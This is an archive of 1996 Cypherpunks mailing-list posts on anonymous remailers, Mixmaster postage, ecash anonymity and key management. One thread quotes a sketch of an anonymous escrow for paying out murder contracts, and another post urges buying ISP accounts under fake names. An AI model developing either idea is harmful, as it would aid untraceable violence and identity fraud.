>gateways can still be signed up by their operators under such a system, and
>it's possible the remailer might be charged along with the operator if
>copyrighted material was posted.
>
>>Encryption hides the contents of the messages you send from
>>eavesdroppers.  But they can still see who you are communicating with.
>>Remailers extend privacy protection beyond "what you say" to "who you say
>>it to".  When used with pseudonym servers and some of the extensions we
>>have discussed here over the years (maildrops, etc.), they can allow the
>>anonymous two-way communication that is needed for real privacy.
>
>        How much use is a pseudonym if you can't practically use it for
>building reputation capital? It's hard to do that when you can't send to anyone
>but individuals, instead of to publically available sources.
>        One idea would be bonded pseudonyms. If you put up an adequate bond to
>the remailer front end operator (to A. pay fines and B. cover any legal fees),
>then you get to send to public fora. This would also be profitable for the
>remailer operator, if he/she got to keep the interest (assuming deposit into
>some investment).
>        -Allen

----------------------------------------------------------
Lance Cottrell   loki@obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://www.obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche
----------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: loki@infonex.com (Lance Cottrell)
Date: Sun, 19 May 1996 09:11:42 +0800
To: cypherpunks@toad.com
Subject: Re: The Crisis with Remailers
Message-ID: <adc3d6d50602100495f2@[206.170.115.3]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:37 PM 5/15/96, Timothy C. May wrote:
>We used to discuss remailer architecture, topology, functionality, and
>"ideal behavior" quite a bit a few years ago, but seldom do here on the
>Cypherpunks list anymore. Various reasons: same old discussions,
>commercialization of Mixmaster-type remailers (so I hear, and Lance
>Cottrell can clarify this if this is indeed a factor) may be inhibiting
>free discussion of planned features, and perhaps the discussion is going on
>elsewhere (on remailerpunks, or the remailer operator's list).
>

The commercialization of Mixmaster fell through some time ago. It is back
to being completely free of encumberments. A second implementation is also
in the works (by a better programmer than I).

        -Lance


----------------------------------------------------------
Lance Cottrell   loki@obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://www.obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche
----------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sun, 19 May 1996 09:58:00 +0800
To: tcmay@got.net (Timothy C. May)
Subject: TCM: mafia as a paradigm for cyberspace
In-Reply-To: <adbff61705021004c957@[205.199.118.202]>
Message-ID: <199605181943.MAA11760@netcom12.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


TCM
>In fact, nearly all of the alleged problems with anonymous systems,
>especially the issues of defections, trust, expectation of payoff, etc.,
>have parallels in other "extra-legal" situations. For example, the Mafia
>and other extra-legal or criminal operations.

ah, and therein lies the rub. why do you hold up the mafia as an
example of how cyberspace might work in the future? it's no wonder
that people are intimidated by some cpunk ideas.

do you really consider the mafia a good example of how you would 
like "cyberspatial reality" to operate? it seems to me that people
developing future infrastructure for cyberspace ought to be more
concerned about making mafia-like roles less easy, not more easy.
but obviously this is just yammering on my part, because I and
others on the list know you better than that.

this of course is not the first time  you have held up the mafia
as a glowing paradigm, and the reason I am now commenting on it. I recall
a rather stunning message some time ago in which you talked
endearingly (well, as much as it is possible for you to do so) of
mafia informants being hunted down through information warfare,
and why this was quite fitting because of the way the government
uses the same manipulation via witness relocation. (well, not quite
like that, but the logic was hard to follow)

>Do they sometimes defect (welsh)? Sure. Do they sometimes screw over the
>little guy? Sure. Do people trust them just enough to keep dealing with
>them voluntarily? Sure.

not in a civilized society. good g*d, you consider the mafia a
model of good business? are you aware of what goes on in Italy
and Columbia, and you are becoming a mafia apologist? the basic
rule of thumb if you are operating in a mafia-like organization
is "only deal with people you can manipulate or rub out without
consequence", quite the opposite in legitimate business.

> (Before anyone mentions it, there are of course
>cases where people are forced to deal with criminal gangs nonvoluntarily,
>such as with shakedowns, hijackings of trucks, etc. But a large fraction of
>the dealings with the Mafia, Jamaican gangs, Russian mob, etc., are for
>market reasons, where a market need for drugs, girls, cheap cigarettes,
>gambling, loans, etc., is being filled by players who are outside the
>normal legal marketplace.)

an interesting thesis, quite revealing. "the mafia is fulfilling a 
valid market purpose. the killings & violence are just minor secondary
issues."  I believe in contrast I would define the mafia exactly
the opposite. the violence and terror is the key part of the mafia agenda.
the activities they involve themselves in are secondary to promoting
the basic agenda of obtaining money in any way possible. how can you
portray the mafia as an honorable business? what you will find, I think,
is that the "professionalism" that was supposedly a part of the mafia
is crumbling into total anarchy. the mafia is undergoing a transformation
in which many of their sacred taboos, such as mafia wives not being
involved, not killing certain people, etc.-- are dissolving. there
is no honor among thieves.

of course I highly doubt you will respond to my points, because you
will realize your error of revealing too much of your true opinion.
best to hide in the woodwork and post a few more bland messages and
everyone will forget my blasphemous challenge in a few days beneath
the froth.

>A number of years ago the example I usually used was "Ace Escrow--You Slay,
>We Pay," to illustrate that an anonymous escrow holder (holding untraceable
>e-cash deposited by the purchaser of a murder contract) could pay off a
>murderer who presented certain evidence, all without any of the parties
>having any idea whatsover whom the other parties were.

what amazes me about people who tend to have a warped mindset is that
they think new technology, such as cyberspace, creates a new morality.
suddenly murdering, violence, drug dealing, or whatever are supposedly
thrust into some new reality in which old rules no longer apply.
you and Jim Bell are unbelievably similar, as much as either of you
would hate to admit it. its just a cloak, in my opinion, for trying
to evade culpability. the ultimate utopia for some on this list would
be a world in which they can be held accountable for absolutely nothing,
by absolutely no one. "anarchy" is as good a word as our reality can
come close to, although I believe such a reality would be far more
sinister than that adjective connotes.

> The problem is then
>one of whether the escrow company will simply pocket the money and not pay
>off.  First, it can be set up (I think) that the e-cash is uncashable by
>the escrow company...but I'm not sure this is needed. A better solution is
>to rely on the basic nature of escrow or bonding services: their reputation
>capital is much more valuable to them than anything to be gained by
>defecting and burning their clients. Except if they are about to retire
>anyway...as with the bonded courier who defects to Rio de Janeiro with a
>bag of diamonds....the trick is to spread the escrow money around to
>multiple escrow agents, and to rely on "escrow testing services" which
>periodically ping or test the services....

think about it really hard, TCM. work out those difficult problems
associated with trying to kill people and get away with it, using
new sexy advances in technology and theory. you
have a very good start after years of deep thinking. why, 
if you can come up with such creative and compelling ideas on 
DC nets and remailers, surely you can solve this problem. it is 
a problem that begs for resolution. how many people have yearned for
such a capability over the centuries!! 

maybe talk to Jim Bell some more. perhaps
eventually you will perfect the method of perpetrating the perfect
killing!! I really do admire you, because killing people without
getting caught is surely a great unrecognized art, and one of the
most unappreciated and misunderstood.
something that has only been a dream to the blighted
wretches prior to our glorious new phases of cyberspatial technology, 
which makes human morality completely obsolete.

surely once all these difficult issues can be resolved (and surely
they can, with such great minds as RSA or Chaum walking around the
planet) there will be some excellent business opportunities for
some lucrative ventures and profits. interesting investment
possibilities. surely you will keep us informed of any future
developments so we can invest wisely as you have done for so long.

>There are many issues here. I'm not advocating murder markets, just noting
>that they provide an easy to understand and fairly "pure" example. If it
>can be done with murders for hire, it can be done with nearly anything.

right, <wink wink>

oh well, thanks for the entertainment. usually you have to go
to a theater to get the "chills up the spine" effect. kinda slick
one can get it in cyberspace.  you're right, this cyberspace stuff
has a lot of possibilities.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sun, 19 May 1996 09:21:06 +0800
To: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Subject: Re: The Crisis with Remailers
In-Reply-To: <BZs5ND7w165w@bwalk.dm.com>
Message-ID: <199605182006.NAA13449@netcom12.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



>> 2. there is no good way to deal with spams or other so-called "abuse"
>
> Nor should there be.  What's one person's abuse is another person's
>free speech.  Internet traffic should not be censored based on contents.

pardon me, but a rather shallow response. 

you simply cannot ignore the spam problem by saying, "censorship
is not acceptable". this is not a solution. there is definitely
a spam problem in cyberspace, and it definitely has not been
solved. (by "solve" I mean, a solution that is acceptable to most
while at the same time preserving "freedom of speech")

when you say, "internet traffic should not be censored based on contents"
you have something that sounds like Jefferson wrote, but in fact in
practice sounds like someone who has never designed a serious
technological device that resists negative uses by design and not
by dreamy assumption. what is the actual application of your
insistence? this reminds me of the vagueness of marx saying, 
"if people would only do it my way, we would have a utopian government". 
apparently either people never figured out what he was really 
talking about, or he was wrong.

perhaps after someone continues to send you a recurrent mailbomb of
100 MB per day do your site for 1 year, you will still insist that
"internet traffic should not be censored"...

whoever creates/funds the infrastructure can use it any way they so choose.
a usenet adminstrator has absolutely no obligation to dedicate vast
amount of his costly computer resources in cpu time or space to
material he does not wish to even spit on. the fact that he is forced
to in many situations shows how little choice the software gives its
users.

the spam problem will only be solved once people begin to realize what
kind of a problem it is. the same problem that allows spam to 
explode all over Usenet is the principle that gives you chain letters
and unsolicited junk email to your mailbox. it is the same problem.
a solution might be possible if people put their minds to it instead
of wallowing in irrational emotionalism about censorship.

the spam problem is critical to anonymity. it would seem if you
can't even solve the spam problem with identified communication, you
are surely not going to solve it with anonymous communication.

hence my comments from here from time to time that the technological
problems of anonymity are not the true obstacle to widespread use. 
there are deeper problems that cpunks skirt around but fail to grasp
because of numerous prejudices. 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Sun, 19 May 1996 06:13:04 +0800
To: msmith@rebound.slc.unisys.com (Matt Smith)
Subject: Re: distributed keys
In-Reply-To: <199605151447.OAA17650@rebound.slc.unisys.com>
Message-ID: <199605181807.NAA01201@homeport.org>
MIME-Version: 1.0
Content-Type: text


Since no one seemed to mention them, check out Photuris and SKIP.
Both are key management proposals for IPsec.

Adam


Matt Smith wrote:
| 
| 
| Has anyone heard of an algorithm for managing keys automatically in a 
| distributed system?  
| 
| For instance, if some low level security were to be implemented in a
| a networking stack where authentication was to be implemented, you would want
| to have each node have it's own signature so that signature checking can 
| take place when one node connects to another node.  The trick is then 
| getting every node's keys distributed to every other node.
| 
| Here are some ideas that I had, but neither is very desireable:
| 
| -  Manual distribution.  User configures every node's key into every node.
|    Configuration becomes a major hassle and mistakes are a pain to debug.
|    An advantagous side effect is the user can configure which machines can 
|    talk to which machines if they're feeling particularly facist.
| 
| -  At connection time, each node determines whether or not it has the other
|    node's key.  If not, a symmetric key is generated via DH and public keys
|    are exchanged.  The problem comes in if someone is spoofing the machine
|    to begin with.  Then you'll have the wrong public key.  Chicken, egg.  
|    Egg, chicken.  
| 
| -  Having a certifying node which every other node has the public key to and
|    who has everyone else's public key.  Requests are made of this server.  
|    The trick is making this server secure and forcing the user to devote
|    resources to this endeavour.
|    
| Thoughts?
| 
| -- 
| Matt Smith - msmith@unislc.slc.unisys.com
| "Nothing travels faster than light, with the possible exception of bad news, 
| which follows its own rules." - Douglas Adams, "Mostly Harmless"
| Disclaimer:  I came up with these ideas, so they're MINE!
| 


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: loki@infonex.com (Lance Cottrell)
Date: Sun, 19 May 1996 11:14:21 +0800
To: cypherpunks@toad.com
Subject: Re: The Crisis with Remailers
Message-ID: <adc3e4280c021004b7c4@[206.170.115.3]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 9:00 AM 5/18/96, Dr. Dimitri Vulis wrote:
>"Vladimir Z. Nuri" <vznuri@netcom.com> writes:
>> 1. there is no economic incentive.
>
>So, add the code to mixmaster (and even the old style remailers) to
>collect e-cash as it passes on the anonymous message. Then this will
>be a good way to accumulate some e-cash, and a number of people will
>try running remailers for this very purpose. Witness the recent
>Usenet spam by someone advertizing a for-pay remailer.
>

I was invited to the digicash API design meeting precisely to make sure it
could be used in remailers. It will not be using the current API. The
problem is that Mixmaster requires exact knowledge of the size of every
object in the message, to maintain constant message size. I could set aside
room for one, two, three coins, but there is no guarantee that the payment
will be made with only that many coins. The current API is going to be high
level. It will does not allow the program to know anything about the
internals of the payment. I need to be able to specify payment of amount X
using no more than N coins. As soon as I have that level of control, you
will see postage in Mixmaster.

        -Lance

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMZ40x/Pzr81BVjMVAQFdTQf/VtRl3MEm+YfIYxsJdEhnv9lsL26S00oG
RTvJiVbzyriGmWBhQY14ITQjnPrNNnRYfrmxVT2nRAEpfC8a63TqD5BN2eeUOSWU
g/eagI3mWqlQssjCpeOEq6pzBcvKCTu2nECfAWCVN87MA7thq4Xj3haFjv+NP2K6
i8Bq/JRz6oaq35Bz0lqskBemiUOLXJOUK93LXFpw3VlTces+vDMSCWXwtkhAOLLO
yav12MbRJRt/heUotsl6wzp2tdEV4xlsciedUOfk8fQVDSvh31J2xyvaupepHosC
UUCz3sc8f4icWXCtBkimLyzgp/pNg7E9rN//Ps8ZzQquKPcr/7GtAQ==
=BC1f
-----END PGP SIGNATURE-----

----------------------------------------------------------
Lance Cottrell   loki@obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://www.obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche
----------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: qut@netcom.com (Dave Harman)
Date: Sun, 19 May 1996 10:40:16 +0800
To: cypherpunks@toad.com
Subject: Re: SEVERE undercapacity, we need more remailer servers FAST
In-Reply-To: <Pine.LNX.3.93.960517183716.1298A-100000@smoke.suba.com>
Message-ID: <199605182050.NAA14663@netcom9.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


You write:

! On Wed, 15 May 1996, Black Unicorn wrote:
! > 
! > I would really like to see a remailer that is somehow blinded.
! > I don't know enough about how mail paths are generatered, but is it
! > impossible to conceal the origin of remailer postings? 
! > Postings made to remailernym@alpha.c2.org would be spit out somewhere but
! > without accountability?
! > 
! > Impossible?  Would do wonders defeating traffic analysis.
! > 
! > I'd consider running a remailer, but after listening to the response to
! > the anonymous poster a while back, it sounds like there are few if any
! > simple options which do not require major time and effort to setup and
! > run.
! 
! 	I was thinking about this last night, hence my question about
! running mixmaster under Xenix (or minux for that matter).
! 
! 	How about this as an idea:
! 
! 	Get a few (3 to 5) accounts in a high density market (i.e. lots of
! ISP's locally) set up a unix machine on a cheap machine. Have the anon
! messages get sent to the pop accounts. Once an hour (or less depending on
! budget) have the unix box poll the different pop accounts mix the messages
! and resend them the next hour. 

YES YES YES!!!!!!
SLIP/PPP/SHELL IT DOESN'T MATTER, DOWNLOAD MAIL, PROCESS, UPLOAD, MAIL, POST!!!!!
LINUX MODEM/CUA1 OR SLIP/PPP!!!!!!!!
PAID WITH *FAKE* NAME/ADDRESS WITH POSTAL MONEY ORDER!!!!!!
I SUCK, I DON'T CODE!!!!!!
IF THEY WONT GIVE YOU "FROM: " AND 50 POSTS/500 EMAILS A DAY GET ONE THAT WILL!!!!!!
THIS IS A CYPHER EMERGENCY!!!!!!!!
WE NEED 1,000 SERVERS F A S T!!!!!!!!!!!!!!
POSTAL COUPONS AND FOREIGN ACCOUNTS!!!!!!!!!!!!!
WE NEED SERVERS NOT CLIENTS!!!!!!!

! 	This could be further obfuscated by batching the messages up and
! posting a whole chunk of messages to a different similar remailer else
! where, or by just plopping an encrypted tar'd file on a ftp site where
! another remailer grabs them and splits and remails them.

THE USER/CLIENT DOES THIS SORT OF STUFF!!!!!!!!!!!!
WE DON'T NEED ANYTHING BUT 1,000 WORLD HACKTIC STYLE REMAILERS!!!!!!!!!!!









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: qut@netcom.com (Dave Harman)
Date: Sun, 19 May 1996 11:06:28 +0800
To: CYPHERPUNKS@toad.com
Subject: Re: "Too cheap to meter"
In-Reply-To: <Pine.GUL.3.93.960518020843.19939E-100000@Networking.Stanford.EDU>
Message-ID: <199605182056.NAA15181@netcom9.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


You write:

! On Fri, 17 May 1996, Timothy C. May wrote:
! 
! > At 2:38 AM 5/16/96, Alan Horowitz wrote:
! > >Hey, let's build faster and faster fiber-optic networks. Let's create
! > >bandwidth so cheap that it won't even pay to meter it.
! > 
! > "Too cheap to meter"? Wasn't that what nuclear power promised in the 1950s?
! > 
! > (I'm actually a supporter of nuclear power, for a variety of reasons, so
! > this is not meant as just a cheap shot against nuke plants. But this was
! > one of the "selling points" of nuclear, later shown to be a falsehood.)
! 
! Actually, nuclear power, per se, is damn cheap. It's the collateral
! effects (real, i.e., waste disposal and keeping fissile materials secure
! from terrorists, and imagined, i.e., overregulation) that are so
! expensive.
! 
! Just like the net. We could have a virtually free flow of information, but
! that's not exactly what the gubmint wants, is it. Not to mention that it's
! not exactly what we want, either -- Canter & Siegel are only the tip of
! the iceberg of the Tragedy of the Commons we'd see on a truly free
! network. 
! 
! We don't need the CDA or anything quite that stupid, but I'll drink to
! overpriced, arbitrarily restricted net access any day.

CAPITALISTS' SUCK

! -rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pgut001@cs.auckland.ac.nz
Date: Sat, 18 May 1996 16:06:07 +0800
To: cypherpunks@toad.com
Subject: Re: Any DLL's that handle Public Key Encryption or Key Exchange?
Message-ID: <199605180202.OAA09277@cs26.cs.auckland.ac.nz>
MIME-Version: 1.0
Content-Type: text/plain


Death rays from Mars made Bill Stewart <stewarts@ix.netcom.com> write:
 
>There's an RSAEURO drop-in clone of RSAREF that's on ftp.ox.ac.uk, so you
>could write a version of your software that lets Yankees and non-Yankees drop
>in whichever version is appropriate without worrying about patent or copyright
>problems.
 
I've already got a nice fast RSA implementation, so I think I'll stick with
that.  Besides, I'm not terribly keen on using a library which has stolen code
in it.
 
If anyone wants to create an RSAREF version, all you need to do is replace one
module (lib_rsa.c) with an RSAREF-compatible version (that's why I mentioned
plug-in encryption modules in the docs - you just unplug the existing code and
plug in RSAREF instead).  What you need to do is use RSAPublicBlock() and
RSAPrivateBlock(), the rest is just wrapper code which you can base on the
existing lib_rsa.c.  My estimate is that it's about an afternoons work.
 
>Any RSAREF system used in the US has the problem that it's limited to the
>"official" interfaces, which means you can't do fully general RSA without
>permission.
 
I got permission from RSADSI to bypass the official interface to RSAREF for
HPACK, my archiver which has PGP-compatible encryption, in 1993.  However I
suspect getting permission for the same thing in a general-purpose library,
especially one which has RC2, RC4, and DESX[1] in it, may be difficult since
parts of the library are essentially a free version of BSAFE (not by design,
they just ended up that way).
 
[1] Well, it will have DESX once I can get some test vectors to make sure I've
    got it right.  Does anyone have some I can use?
 
Peter.
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lcs Mixmaster Remailer <mix@anon.lcs.mit.edu>
Date: Sun, 19 May 1996 07:55:17 +0800
To: cypherpunks@toad.com
Subject: None
In-Reply-To: <199605180530.WAA03258@infinity.c2.org>
Message-ID: <199605181820.OAA12969@anon.lcs.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


> Does anyone know of an anonymous remailer that has an SMTP server
> (hopefully unlogged) that I can specify in a special variant of the
> "sendmail.cf" sendmail configuration file for sending mail to
> anonymous servers?
> 
> I use a PPP connection, and right now I'm using my ISP's default
> server and I don't like the idea of logs being kept, even though the
> messages themselves are chained/encrypted.
> 
> Maybe I'm "paranoid", but if I wasn't, I probably wouldn't bother
> with PGP, C'punk remailers, etc. <g>

Anon.lcs.mit.edu does not perform ident lookups, does not add
Received: headers, and runs at log level 1 (only "Serious system
failures and potential security problems" logged, according to the
sendmail manual).

This is useful for testing things out anonymously, but I don't
understand why you would want to use it an a regular basis.  Why don't
you send your mail directly from your home machine to the first
remailer hop?  Nothing is forcing you to send outgoing mail through
your ISP's mail server or any other one particular mail server.  Why
would you want to do that in the first place?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: iang@cs.berkeley.edu (Ian Goldberg)
Date: Sun, 19 May 1996 11:59:17 +0800
To: cypherpunks@toad.com
Subject: My meeting with Chaum (Also: ecash full anonymity and a legal question)
In-Reply-To: <adc276f5060210049520@[205.199.118.202]>
Message-ID: <4nlfee$vcj@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <adc276f5060210049520@[205.199.118.202]>,
Timothy C. May <tcmay@got.net> wrote:
>I first read of Chaum's work in late '85, in his CACM article, and then
>"rediscovered" it when I was doing some review work for Phil Salin's AMIX
>information market startup in 1987.
>
>Certainly the text of Chaum's articles implied both payer and payee
>anonymity, though certain details may've been unclear to some of us.
>
>When Chaum unveiled his "payer is anonymous, but payee is traceable," some
>of us were surprised.
>
>(On the other hand, I have had a longstanding faith that the system can be
>made to be both payer- and payee-anonymous. Moneychangers, for example.)
>
>>Deal with the devil?
>>
>>Any "complete" digital cash implementation has to provide for payee anonymity.
>>
>
>I agree with Jim Bell on this completely. I don't know if Chaum has been
>seduced by the Dark Side, or is looking to get digicash widely deployed by
>"respectable" institutions, or is telling the truth (that his system
>_never_ provided for real untraceability), but I know that Cypherpunks
>should always strive for full untraceability.
>
>One-sided traceability is not enough.
>

So here's the deal with ecash "as it works today":

If a payment is made with ecash through some anonymous channel (like a remailer
or a post to alt.anonymous.messages), neither the payee or the payor can
directly identify the other (that is to say, neither's identity need be stored
in, or used to construct, the payment).

_However_, in the current implementation, the payor can collude with the bank
to reveal the payee's identity.  More specifically, the payor can produce
the "blinding factor" he used when he withdrew the coins from the bank,
which he later gave to the payee, who deposited them.  The bank can use this
information to figure out what the unblinded coin looked like, and then check
its logs to find out who deposited that coin (remember that with the current
implementation, when a coin is paid to someone, he must immediately deposit it,
or risk losing the money if the payor tries to cancel the payment or spend it
again).

Note that the act of giving up the blinding factor will reveal
_both_ parties in the transaction.  That is, in order to reveal the payee,
the payor must identify himself.  (Not a big deal in the case of LEO...)
This is because what is being identified is a "link" between a blinded coin
that was withdrawn from the payor's account to the unblinded coin that was
deposited to the payee's account.

The way "full anonymity" works is that the coin is blinded by _both_ the payor
and the payee before being withdrawn from the bank.  That way, in order to
reveal the link between the payor and the payee, _all three_ of the bank, the
payor, and the payee must collude.  This is not a big deal (the reasons for
which are left as an exercise).

Relevance:

The ecash "concept" (numbers that _are_ money) produces an inherently
bearer instrument (modulo double spending protection).  The current software
implements payor-side blinding only, in order to appease the Powers That Be.
There's no reason why, given the information currently available, and
even better when the library is released, with a weekend's work
(a week if you're slow), you couldn't produce the handful of functions
you'd need to implement the fully-anonymous protocol, REGARDLESS of whether
you had access to the source to the current client or the library.

The reson I bring this up is that yesterday, I had a 2.5-hour chat with
David Chaum.  These seemed to be the important bits:

o The current plan is to release a lowish-level, binary-only library, as well
  as highish-level source which calls that library, and implements the
  published high-level API (http://www.digicash.com/api/).  Release date: RSN.

o The source to the current client, and the low-level library will _not_ be
  released.  Dr. Chaum's main reason was that releasing the source would make
  it "too easy" to implement full anonymity, which he sees the various
  regulators seeing as a Bad Thing(TM).  I disagreed.  With the recent release
  of the byte-level encoding (http://www.cs.berkeley.edu/~iang/ecash/),
  it would be not too much work for a sufficiently motivated person to
  do, with or without the source.  In fact, it's unclear the source to
  the low-level library is really all that helpful in this respect.

o He doesn't really want there to be an independent implementation of the
  ecash library, with full source available, also for the above reasons.
  The phrase "The worst thing you could do would be to go to Canada, write
  the library, and publish it on the net." came up.  In both this and the
  above case, he didn't believe that availability of source code for
  security analysis (everyone runs code they didn't write) was an important
  issue.  As far as I could tell, he was thinking like a Cryptographer
  (not surprising, as that's what he is (and a damn fine one, at that)):
  he wanted to have a way to verify that the _protocols_ were behaving
  correctly; that is, they were not leaking private information, and that
  money wasn't being lost.  The issue of buffer overruns causing the security
  of my entire machine to be compromised wasn't important.

o Similarly, the source to the mint will not be published.  Notwithstanding
  that the last few bugs I found in ecash were with the mint software, of which
  I've never seen source nor object code, again, thinking like a Cryptographer,
  he insisted that the system was designed so that no matter how one person
  cheats, the others can't be affected.  That may be true in theory, but in
  practice, if there's a fingerd-style hole in the mint software, and someone
  manages to steal the mint's private key, and makes counterfeit ecash,
  does that really not affect me, a customer?  If I'm going to be buying into
  this system, I would like to have some assurance of its security, and
  it is well-known that the best way to do that is to have open source.

So: a question to legal-types, maybe:

I am, in fact, going to Canada, and was considering writing a version of
the library while I was there.  Now, Chaum has a patent on 2 lines of
code (blinding the coin before it goes to the bank, and unblinding the
value returns).  Believe it or not, I would like to stay within the law.
Would my writing a library that worked perfectly well with the current
system, but just didn't do blinding (and thus has no anonymity) be
"contributory infringement" or something like that (noting that it would
likely be trivial for someone to add in the relevant 2 lines)?  Would it
matter (either including the 2 lines or not) if I'd: (a) sell it (b)
give it away on the net (c) give it just to a few people (d) only use it
myself?

Remember also that this would be done in Canada, just to make the question
tougher...

   - Ian "I didn't rant nearly so much as I thought I would..."

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMZ5Ay0ZRiTErSPb1AQFujwQAiQy1nr7pkbk4jQ2wOJREkNFLpEJ33aO3
GoTo0LOa1ej+j/t7AkoGXmc+Udd+HD4VSkEvJE0dwMHkvbb+1DReFhpZ+F7xwf5d
8t9XLKMlL7HbQAxD1Vc2LjgooQxeOoQHyG64ovhPcEwU4v5jF0PWnYex++SKO2Bn
ytYOChOmJ9Q=
=mN0s
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathan Syfrig <nsyfrig@condor.depaul.edu>
Date: Sun, 19 May 1996 09:22:05 +0800
To: cypherpunks@toad.com
Subject: Re: Why does the state still stand:
In-Reply-To: <199605181326.JAA05100@pair>
Message-ID: <Pine.SOL.3.91.960518142018.8331D-100000@condor.depaul.edu>
MIME-Version: 1.0
Content-Type: text/plain


I normally don't read or post to this list, so I'm hoping e$pam will pick
up any relevant replies or people Cc: me personally (information overload).

My ignorance is probably showing, but it seems that we have a real
fundamental problem here.  IP numbers of re-mailers, whether free or 
commercial, are easily identified and therefore become easy sniffing 
targets.  This means that the choke points currently used to censor and 
otherwise restrict information can easily come into play - i.e. ISP's 
(we've already seen censorship being applied to at the ISP level, so we 
have sufficient aggregation to filter and sniff).

Therefore, in the abscence of roving remailer destinations that change 
quick enough to evade some sniffing (notice, I didn't say avoid), it 
seems that there really is no anonymity.  Even if we could randomize 
destinations (a la Pirate Radio with roving dial locations), that would 
defeat the purpose - the ability to allow anybody to use anonymous 
remailers.  So, if we feel this capability is important (and I do), how 
do we solve the problem?

Nathan
(usual "views are my own" diatribe here)

On Sat, 18 May 1996, e$pam wrote:

> Forwarded by Robert Hettinga
> 
> -----------------------------------------------------------------------
> Date: Thu, 16 May 1996 07:19:39 -0700
>  From: Hal <hfinney@shell.portal.com>
>  To: EALLENSMITH@ocelot.Rutgers.EDU
>  Subject: Re:  Why does the state still stand:
>  Cc: cypherpunks@toad.com
>  Sender: owner-cypherpunks@toad.com
>  Precedence: bulk
> 
> 
> From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
>  > I did not
>  > include offshore.com.ai in Anguilla due to its high cost; I consider anything
>  > over 25$ a month to be impractical.
>  >
>  > _Country/Area_  _Name_                          _Email_
>  > Anguilla        Cable & Wireless                webmaster@candw.com.ai
>  > [...]
>  
>  Thanks very much for making this list.  However I would not be so quick
>  to reject http://offshore.com.ai.  It is run by long-time Cypherpunk
>  Vince Cate, apparently specifically for the kinds of purposes we are
>  discussing.  His project was discussed in a recent issue of Wired, I
>  think the May issue.  (I have no contact with Cate, and have never met
>  him as far as I can recall.)
>  
>  For doing something like running a remailer which will post material
>  which is illegal and/or copyrighted in the U.S., you are going to need a
>  service which can stand up to pressure.  Presumably some monetary
>  incentive is going to be a necessity.  Of course by this standard $25 a
>  month is pretty inconsequential.
>  
>  One issue is whether these banking-secrecy countries like Anguilla are
>  followers of the Berne convention or other international copyright
>  regulations.  Banking secrecy and software piracy don't necessarily go
>  hand in hand.  I hear a lot about copyright violations in China but not
>  in the Caribbean.  So actually it isn't clear that this country is the
>  right location for a remailer that can post arbitrary material.
>  
>  As for the costs to the remailer operator, he simply passes those on to
>  his customers.  I think in the long run onshore remailers will be forced
>  to take measures to restrict copyright-violating posts.  So if your
>  choice is between paying nothing and not getting your whistle-blowing
>  message posted, or paying $10 and getting it out on the nets, then
>  hopefully it is worth that much to you.
>  
>  We have discussed for-pay remailers and the consensus has been that no
>  one would use them when others run for free.  However now I think the
>  false premise is being exposed, that free remailers simply will not be
>  able to run in the current mode for much longer.  Once a single remailer
>  operator has been fined thousands of dollars because somebody posted some
>  copyrighted message, I don't think you will find many people eager to
>  sign up as operators.  So this dream of a volatile collection of
>  remailers popping up and going away just doesn't work in my view.  Why
>  would anyone offer a service knowing that he was exposing himself to
>  liability like this?  It would be just a game of Russian roulette,
>  waiting to see whether it is your remailer which gets the bullet in the
>  form of a post which violates the copyright of someone with deep
>  pockets.
>  
>  Hal
>  
> 
> 
> --------------------------------------------------
> The e$ lists are brought to you by:
> 
> Take Your Business Online with Intertrader Ltd, Edinburgh, U.K.
> Visit http://www.intertrader.com or email info@intertrader.com
> 
> Making Commerce Convenient (tm) - Oki Advanced Products - Marlboro, MA
> Value-Checker(tm) smart card reader= http://www.oki.com/products/vc.html
> 
> Where people, networks and money come together: Consult Hyperion
> http://www.hyperion.co.uk                    info@hyperion.co.uk
> 
> See your name here. Be a charter sponsor for e$pam, e$, and Ne$ws!
> See http://thumper.vmeng.com/pub/rah/ or e-mail rah@shipwright.com
> for details...
> -------------------------------------------------
> 




